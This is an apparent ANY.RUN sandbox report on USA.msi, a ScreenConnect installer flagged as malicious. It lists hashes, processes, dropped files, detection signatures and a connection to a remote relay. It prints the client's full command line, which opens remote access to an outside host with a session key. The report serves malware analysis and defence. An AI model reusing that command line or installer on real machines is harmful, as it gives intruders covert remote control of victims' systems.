analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

USA.msi

Full analysis: https://app.any.run/tasks/c4873039-2482-4a01-b02e-9d69b762e4cf
Verdict: Malicious activity
Analysis date: April 23, 2019, 08:29:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
Indicators:
MIME: application/x-msi
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {83D7EEBF-F3DF-4321-89DC-7FD70948F869}, Create Time/Date: Wed Jun 14 22:59:26 2017, Last Saved Time/Date: Wed Jun 14 22:59:26 2017, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
MD5:

A4CDBC1322B78C9CD7057B57864A4D7E

SHA1:

F934C8647CE9F1405C940C66AF8832743F0C7109

SHA256:

E1F1980A91C6E9495A8DDED48CACDD2B4457330F2C682811961D7777C66B955D

SSDEEP:

24576:P+wq+A/VzUgKlwUHN4SdsoWbh/dyRXYNGLZLnnUUGGuZLRJuPTpo+urhwQUv:Pv1AdzKOUt4SdK/dyRtL5ngGuZtx1g

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • ScreenConnect.WindowsClient.exe (PID: 3624)
      • ScreenConnect.ClientService.exe (PID: 1856)
    • Loads dropped or rewritten executable

      • ScreenConnect.ClientService.exe (PID: 1856)
      • ScreenConnect.WindowsClient.exe (PID: 3624)
      • rundll32.exe (PID: 2896)
  • SUSPICIOUS

    • Uses RUNDLL32.EXE to load library

      • MsiExec.exe (PID: 588)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3920)
      • msiexec.exe (PID: 3672)
    • Modifies the open verb of a shell class

      • msiexec.exe (PID: 3672)
    • Creates files in the program directory

      • ScreenConnect.ClientService.exe (PID: 1856)
  • INFO

    • Searches for installed software

      • msiexec.exe (PID: 3672)
    • Adds / modifies Windows certificates

      • DrvInst.exe (PID: 1520)
    • Low-level read access rights to disk partition

      • vssvc.exe (PID: 2860)
    • Application launched itself

      • msiexec.exe (PID: 3672)
    • Changes settings of System certificates

      • DrvInst.exe (PID: 1520)
    • Creates a software uninstall entry

      • msiexec.exe (PID: 3672)
    • Creates files in the program directory

      • msiexec.exe (PID: 3672)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msi | Microsoft Windows Installer (98.5)
.msi | Microsoft Installer (100)

EXIF

FlashPix

CodePage: Windows Latin 1 (Western European)
Title: Installation Database
Subject: Default
Author: ScreenConnect Software
Keywords: Default
Comments: Default
Template: Intel;1033
RevisionNumber: {83D7EEBF-F3DF-4321-89DC-7FD70948F869}
CreateDate: 2017:06:14 21:59:26
ModifyDate: 2017:06:14 21:59:26
Pages: 200
Words: 2
Software: Windows Installer XML Toolset (3.11.0.1701)
Security: Read-only recommended
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
10
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start msiexec.exe msiexec.exe msiexec.exe no specs rundll32.exe no specs vssvc.exe no specs drvinst.exe no specs msiexec.exe no specs msiexec.exe no specs screenconnect.clientservice.exe screenconnect.windowsclient.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3920"C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\Desktop\USA.msi"C:\Windows\System32\msiexec.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3672C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
588C:\Windows\system32\MsiExec.exe -Embedding 495C424700291B0EE9311F1C5E202E24 CC:\Windows\system32\MsiExec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2896rundll32.exe "C:\Users\admin\AppData\Local\Temp\MSI3380.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_1127406 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsC:\Windows\system32\rundll32.exeMsiExec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2860C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1520DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot18" "" "" "6792c44eb" "00000000" "000005C8" "000005C4"C:\Windows\system32\DrvInst.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Driver Installation Module
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
596C:\Windows\system32\MsiExec.exe -Embedding 81F8DC8627DF27917999D9527D8A17A4C:\Windows\system32\MsiExec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3416C:\Windows\system32\MsiExec.exe -Embedding DD56D0B1B2A58E24177127C0039FB257 M Global\MSI0000C:\Windows\system32\MsiExec.exemsiexec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1856"C:\Program Files\ScreenConnect Client (dbf5ba681a8592b2)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=45.32.91.219&p=443&s=f163464f-8e90-402c-8f62-d9d7a5e32f33&k=BgIAAACkAABSU0ExAAgAAAEAAQAHACVHZ6PPUNlDkgpR4aKyhqCk4YNbYZ8FwSgP5mYRqx1TeL7%2beQO%2fzLLpYxw0%2byS41a8lWdlqjeeorR6111AqWhn9%2fTMfYsvIakegdfbGcYMZ3PFd3GNeCixN2cxtamb0MDNixjbUnBWWSH11sdD0Zd0iLmNNPpXJX6v7HPAUDTfiE1M9moB5hoZJG8%2b0ZvFnNrexnHH8uAPNamnuZyuU6%2fqoWxcK%2brWCNbjreu2rsafakhZ%2fmuybp9kqbk8DtjL2%2f%2fz7cSTW2iIR%2bcsfngf%2bfhR9dX0aItpcAFD35ZcFBHGzOgQH%2fi0IoWS00k%2bq7HiQ%2fACbGTwKytpDaK1NUBub&t=&c=&c=&c=&c=&c=&c=&c=&c="C:\Program Files\ScreenConnect Client (dbf5ba681a8592b2)\ScreenConnect.ClientService.exe
services.exe
User:
SYSTEM
Integrity Level:
SYSTEM
Version:
6.3.13446.6374
3624"C:\Program Files\ScreenConnect Client (dbf5ba681a8592b2)\ScreenConnect.WindowsClient.exe" "RunRole" "a56115a8-205c-45ae-a999-3a59f92e381b" "User"C:\Program Files\ScreenConnect Client (dbf5ba681a8592b2)\ScreenConnect.WindowsClient.exeScreenConnect.ClientService.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
ScreenConnect Client
Version:
6.3.13446.6374
Total events
680
Read events
402
Write events
0
Delete events
0

Modification events

No data
Executable files
11
Suspicious files
9
Text files
86
Unknown types
0

Dropped files

PID
Process
Filename
Type
2896rundll32.exeC:\Users\admin\AppData\Local\Temp\MSI3380.tmp-\ScreenConnect.InstallerActions.dll
MD5:
SHA256:
2896rundll32.exeC:\Users\admin\AppData\Local\Temp\MSI3380.tmp-\Microsoft.Deployment.WindowsInstaller.dll
MD5:
SHA256:
2896rundll32.exeC:\Users\admin\AppData\Local\Temp\MSI3380.tmp-\ScreenConnect.Core.dll
MD5:
SHA256:
2896rundll32.exeC:\Users\admin\AppData\Local\Temp\MSI3380.tmp-\CustomAction.config
MD5:
SHA256:
3672msiexec.exeC:\System Volume Information\SPP\metadata-2
MD5:
SHA256:
1520DrvInst.exeC:\Windows\INF\setupapi.ev1binary
MD5:3C8C0B6BF76853A7FDF5D78778A2F4B5
SHA256:3CE928FD923E4557297B5B491157A69358A1C0BDAA371400D04FBF8010E1986D
3672msiexec.exeC:\System Volume Information\SPP\OnlineMetadataCache\{f176fd17-7105-48df-8479-babcecef42f3}_OnDiskSnapshotPropbinary
MD5:38E0FBB31AC2E2D6D52B6E3F8F4CD706
SHA256:FC6500CB5246F7DDB2CAC7BFC9B6C4FF332214A85B02EEDEEF8F2424E196061F
3672msiexec.exeC:\System Volume Information\SPP\snapshot-2binary
MD5:38E0FBB31AC2E2D6D52B6E3F8F4CD706
SHA256:FC6500CB5246F7DDB2CAC7BFC9B6C4FF332214A85B02EEDEEF8F2424E196061F
3920msiexec.exeC:\Users\admin\AppData\Local\Temp\MSI3380.tmpexecutable
MD5:B116A00F4D7D0B1861520683470C244F
SHA256:42FC891FDB0FC34DC3AAF1EDA75B20F8693D88E2F0ED2ED8CFC8E219C1BBBFFF
1520DrvInst.exeC:\Windows\INF\setupapi.dev.logini
MD5:A38FFE708D4D0CF3393BB44BBB439E37
SHA256:F9F7DDD836E365DFBDCAB04111678785499939A6D62F317A65D0076368C935E7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1856
ScreenConnect.ClientService.exe
45.32.91.219:443
Choopa, LLC
US
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
1856
ScreenConnect.ClientService.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] ScreenConnect Remote Admin
1856
ScreenConnect.ClientService.exe
Misc activity
APP [PTsecurity] ScreenConnect
1856
ScreenConnect.ClientService.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] ScreenConnect Remote Admin
1856
ScreenConnect.ClientService.exe
Misc activity
APP [PTsecurity] ScreenConnect
No debug info